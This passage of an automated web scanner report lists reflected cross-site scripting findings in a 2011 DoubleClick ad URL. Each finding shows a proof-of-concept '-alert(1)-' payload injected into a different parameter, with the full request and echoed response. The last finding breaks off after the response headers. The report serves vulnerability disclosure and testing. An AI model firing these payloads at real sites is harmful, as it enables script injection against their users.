1.84. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d821'-alert(1)-'7814853e8be was submitted in the _c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=158092d821'-alert(1)-'7814853e8be&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:12:36 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
tivewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=158092d821'-alert(1)-'7814853e8be&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp%3Dflash%
...[SNIP]...

1.85. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32bc3'-alert(1)-'30e27806cb7 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=2186785932bc3'-alert(1)-'30e27806cb7&_c=15809&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:12:15 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
ar dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=2186785932bc3'-alert(1)-'30e27806cb7&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp
...[SNIP]...

1.86. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_eo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13a0b'-alert(1)-'b4090b2e029 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=9795613a0b'-alert(1)-'b4090b2e029&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:10:51 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
'http://s0.2mdn.net/1887566/300x250_ps1.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=9795613a0b'-alert(1)-'b4090b2e029&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTPr
...[SNIP]...

1.87. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_et parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48fcb'-alert(1)-'890adbd91c3 was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=130923056948fcb'-alert(1)-'890adbd91c3&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:11:12 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
n.net/1887566/300x250_ps1.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=130923056948fcb'-alert(1)-'890adbd91c3&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%2
...[SNIP]...

1.88. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb7b5'-alert(1)-'a24c9917e30 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607cb7b5'-alert(1)-'a24c9917e30&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:10:30 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
ar dcgif = 'http://s0.2mdn.net/1887566/300x250_ps1.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607cb7b5'-alert(1)-'a24c9917e30&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3
...[SNIP]...

1.89. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_pm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cbc3'-alert(1)-'e281d6b67ee was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=979565cbc3'-alert(1)-'e281d6b67ee&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:12:57 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
= '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=979565cbc3'-alert(1)-'e281d6b67ee&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp%3Dflash%26cm_mmc%3
...[SNIP]...

1.90. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_pn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37287'-alert(1)-'39e905a1df2 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=2186867337287'-alert(1)-'39e905a1df2&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:13:18 GMT

